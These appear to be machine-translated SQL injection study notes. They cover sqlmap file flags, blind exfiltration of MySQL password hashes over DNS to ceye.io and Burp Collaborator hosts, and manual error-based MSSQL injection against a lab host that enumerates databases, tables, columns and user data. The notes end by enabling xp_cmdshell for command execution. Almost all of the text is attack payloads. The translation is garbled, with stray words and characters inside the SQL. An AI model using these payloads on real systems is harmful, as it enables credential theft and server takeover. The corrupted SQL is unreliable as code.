sqlmap parameters
--file-read, read files from the database server
--file-write, - file-dest , upload files to the database server
dnslog learning platform and its application in the blind
1, determines the injection point
2, url test whether the provided website DNSlog parsing
SELECT LOAD_FILE (CONCAT ( '\\\\' , (SELECT password FROM mysql.user WHERE user = 'the root' the LIMIT. 1),)) 'mysql.ip.port.b182oj.ceye.io \\ ABC.';
the SELECT LOAD_FILE, the file can be read, do DNS request
example, select load_file (group_concat ( '\\\\ ' , (select concat (user, password ) from users limit 3,1), '. 6rylw1tbh2htjx3hap90nqqj8ae02p.burpcollaborator.net .. \\ aaa'));
if the long response time of the site, it can be resolved described
3, concat using splicing url and inject sql statement to get data
mssql injected by hand
1 to determine the injection point, http: //192.168.190.148/less-1.asp id = 1 ' , suggesting' 1 '' quotes after incomplete?. Illustrate the injection point
2 determines the type of database, http:? //192.168.190.148/less-1.asp id = 1 'and exists (select * from sysobjects) -, has not given the results described background database is sql server
further there are other methods, commonly frame assembly methods, such as a common, asp + mssql, php + mysql / error information page
3, select IS_SRVROLEMEMBER ( 'sysadmin' ); determines whether it is currently sa, http: //192.168.190.148/less- ? 1.asp id = 1 'and ( select IS_SRVROLEMEMBER (' sysadmin '))> 0-- page instructions are not being given the sa account
select is_srvrolemember (' db_owner '); determine the current user to write the file permissions to read the file (db_owner) , http:? //192.168.190.148/less-1.asp id = 1 'and (select is_srvrolemember (' db_owner '))> 0--, the page did not return information indicates that the database did not read and write permissions
select is_srvrolemember (' public ' ); determine whether there is public authority, can burst table, http:? //192.168.190.148/less-1.asp id = 1 'and (select is_srvrolemember (' public '))>
http://192.168.190.148/less-1.asp?id=1 'and (select @@ version) = 1 -, will complain and return the results will come out sql server version
, http: //192.168.190.148/less failed - '[Microsoft] [ODBC SQL Server Driver] [SQL Server] in the nvarchar value and (user) = 1' dbo ' is converted to data type int? -1.asp id = 1. Broke the current user is dbo
http://192.168.190.148/less-1.asp?id=1 'and (the SELECT db_name ()) = 1 - [in the Microsoft] [ODBC SQL Server Driver] [SQL Server] in the It failed nvarchar value 'test' into a data type int. , Is a burst of current database Test
the SELECT db_name (0); function from 0, 0 for the current database, the change in the parameter db_name function, all databases may burst
http://192.168.190.148/less-1.asp ? the above mentioned id = 1 'and (1 name from the SELECT Top master..sysdatabases the WHERE name not in (' aspcms', 'Master', 'Model'))> 1--
the SELECT Top 3 name from master..sysdatabases; can query All databases, plus the conditions, where name not in ( 'db_name ', 'dbname'
http://192.168.190.148/less-1.asp?id=1'and (SELECT top 1 name from test.sys.all_objects where type = 'u' and is_ms_shipped = 0)> 1--, obtaining a first table emails
http://192.168.190.148/less-1.asp?id=1'and (the SELECT name from test.sys.all_objects Top. 1 WHERE type = 'U' = 0 and is_ms_shipped and Not in name ( 'emails '))> 1--, after removal of emalis get the first table, not in an increase in turn broke the table, get all the tables
6, to obtain the specified field of the current database table
http://192.168.190.148/less-1 .asp id = 1 'and (select top 1 column_name from test.information_schema.columns where table_name =' users')> 1 -? obtaining first field
http://192.168.190.148/less-1.asp?id = 1 'and (select top 1 column_name from test.information_schema.columns where table_name =' users' and column_name not in ( 'id'))> 1 -, in addition to obtaining the first field of the id, not in the in turn increasing the field can get all the field names
http://192.168.190.148/less-1.asp?id=1'and (select top 1 name from syscolumns where id = OBJECT_ID ( 'users'))> 1--, obtaining the first field
http: // 192.168.190.148/less-1.asp?id=1'and (select top 1 name from syscolumns where id = OBJECT_ID ( 'users') and name not in ( 'id'))> 1--, in addition to obtaining the id outside the first field, not in order to increase until obtaining all the fields
7, to obtain the value of a specified field in table
http://192.168.190.148/less-1.asp?id=1 'and (select top 1 username from users )> 1 - acquiring the specified data fields, a field only a modified injection
The xp_cmdshell extended mssql
Select count (*) FROM master. dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell', query whether xp_cmdshell extended open
exec master..xp_cmdshell 'whoami' call xp_cmdshell extended
prompt an error, SQL Server prevents a 'sys.xp_cmdshell' access to the components 'xp_cmdshell' process, as part of this component has been closed as a security server configuration. The system administrator can enable 'xp_cmdshell' by using sp_configure. For more information about 'xp_cmdshell' is enabled, please see the SQL Server Books Online "Surface Area Configuration." Open Query Analyzer to perform
EXEC the sp_configure 'Show advanced Options',. 1;
the RECONFIGURE;
EXEC the sp_configure 'the xp_cmdshell',. 1;
the RECONFIGURE;